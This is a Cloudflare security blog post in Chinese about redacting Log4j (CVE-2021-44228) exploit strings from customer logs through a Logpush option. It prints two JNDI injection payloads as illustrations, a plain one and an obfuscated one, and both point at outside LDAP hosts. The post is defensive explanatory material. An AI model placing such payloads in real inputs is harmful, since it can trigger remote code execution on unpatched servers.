订阅以接收新文章的通知:

清理 Cloudflare 日志以保护客户免受 Log4j 漏洞影响

2021-12-14

1 分钟阅读时间
这篇博文也有 EnglishFrançaisDeutsch日本語한국어繁體中文版本。

2021 年 12 月 9 日,CVE-2021-44228这种零日漏洞利用在全球曝光。该漏洞会影响 Apache Log4j 实用工具。Cloudflare 立即更新了我们的 WAF,以帮助防御该漏洞,但我们建议客户尽快更新其系统。

然而,我们了解许多 Cloudflare 客户通过使用 Log4j 的软件使用其日志,因此我们还缓解了通过 Cloudflare 日志的任何漏洞利用。截至本文发稿时,我们在发送给客户的日志中发现高达 1000 次/秒的漏洞利用模式。

客户可以立即开始更新其 Logpush 作业,以自动修改可能触发此漏洞的令牌。您可以在我们的开发人员文档中阅读更多相关信息,或查看下面的详情。

攻击的工作方式

您可以在此处我们的博客帖子中阅读有关 Log4j 漏洞工作方式的更多信息。简而言之,攻击者可以在任何字符串中添加诸如 ${jndi:ldap://example.com/a} 之类的内容。Log4j 会在互联网上建立连接以检索此对象。

Cloudflare 日志包含由公共互联网上的最终用户控制的许多字符串字段,例如用户代理和 URL 路径。通过此漏洞,恶意用户有可能在读取这些字段并使用未修补的 Log4j 实例的任何系统上进行远程代码执行。

我们的缓解方案

遗憾的是,仅仅检查诸如 ${jndi:ldap 之类的令牌不足以防御此漏洞。由于模板中使用强大的语言表达式,还有必要检查混淆的变体。我们已经发现攻击者在使用诸如 ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} 之类的真实用例变种。因此,修改令牌 ${ 是防御此漏洞的最常规方法。

令牌 ${ 在我们目前发送给客户的日志中出现的频率高达 1,000 次/秒。对一些记录进行抽查表明,该令牌的许多情况并_不是_企图利用此漏洞。因此我们无法安全地修改日志,而不影响可能预期在其日志中出现此令牌的客户。

从现在开始,客户可以更新其 Logpush 作业以修改所有地方的字符串 ${ 并将其替换为 x{。

为此,客户可以更新其 Logpush 作业选项配置以包括参数 CVE-2021-44228=true。有关如何使用 Logpush API 执行此操作的详细说明,请参阅我们的开发人员文档中的示例。请注意,此选项目前在 Cloudflare Dashboard 中不可用,仅可使用 API 进行修改。

在 Twitter 上讨论 在 Hacker News 上讨论 在 Reddit 上讨论

日志 漏洞 零日威胁 安全性 Log4J

在 Twitter 上关注 Cloudflare

Jon Levine |@jplevine

Cloudflare 丨Cloudflare

我们保护整个企业网络,帮助客户高效构建互联网规模的应用程序,加速任何网站或互联网应用程序抵御 DDoS 攻击,防止黑客入侵,并能协助您实现 Zero Trust 的过程

从任何设备访问 1.1.1.1,以开始使用我们的免费应用程序,帮助您更快、更安全地访问互联网。要进一步了解我们帮助构建更美好互联网的使命,请从这里开始。如果您正在寻找新的职业方向,请查看我们的空缺职位
LogsVulnerabilitiesZero Day Threats安全性Log4JLog4Shell

在 X 上关注

Jon Levine|@jplevine
Cloudflare|@cloudflare

相关帖子

2024年10月02日 13:00

How Cloudflare auto-mitigated world record 3.8 Tbps DDoS attack

Over the past couple of weeks, Cloudflare's DDoS protection systems have automatically and successfully mitigated multiple hyper-volumetric L3/4 DDoS attacks exceeding 3 billion packets per second (Bpps). Our systems also automatically mitigated multiple attacks exceeding 3 terabits per second (Tbps), with the largest ones exceeding 3.65 Tbps. The scale of these attacks is unprecedented....

2024年9月27日 13:00

Advancing cybersecurity: Cloudflare implements a new bug bounty VIP program as part of CISA Pledge commitment

Cloudflare strengthens its commitment to cybersecurity by joining CISA's "Secure by Design" pledge. In line with this commitment, we're enhancing our vulnerability disclosure policy by launching a VIP bug bounty program, giving top researchers early access to our products. Keep an eye out for future updates regarding Cloudflare's CISA pledge as we work together to shape a safer digital future....

2024年9月27日 13:00

AI Everywhere with the WAF Rule Builder Assistant, Cloudflare Radar AI Insights, and updated AI bot protection

This year for Cloudflare’s birthday, we’ve extended our AI Assistant capabilities to help you build new WAF rules, added new AI bot & crawler traffic insights to Radar, and given customers new AI bot blocking capabilities...